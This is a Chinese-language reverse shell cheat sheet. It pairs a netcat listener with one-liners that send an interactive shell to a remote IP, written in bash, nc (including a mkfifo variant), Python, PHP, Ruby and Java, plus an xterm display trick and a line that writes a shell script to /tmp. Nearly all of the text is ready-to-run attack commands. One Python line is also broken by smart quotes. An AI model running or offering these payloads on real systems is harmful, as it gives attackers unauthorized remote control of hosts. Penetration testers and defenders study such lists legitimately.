使用nc对本地端口监听
nc -lvnp 8888
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"
计划任务:
echo '/bin/bash -i >& bash -i >&/dev/tcp/1.1.1.1/23333 0>&1' > /tmp/sec.sh
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
3.python
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1
“,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([”/bin/sh”,"-i"]);’
4.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
5.ruby反弹shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
6.Java反弹shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
7.xterm反弹shell
反弹shell最简单的形式之一就是xterm会话,应在服务器上运行以下命令.它将尝试TCP端口6001上连接你的(10.0.0.1)
xterm -display 10.0.0.1:1
传入xterm,启动X-Server(1-监听TCP 6001).一种方法使用Xnest(在你系统上运行)
Xnest:1
你需要在授权目标上连接你
xhost + targetip
xterm -display 10.0.0.1:1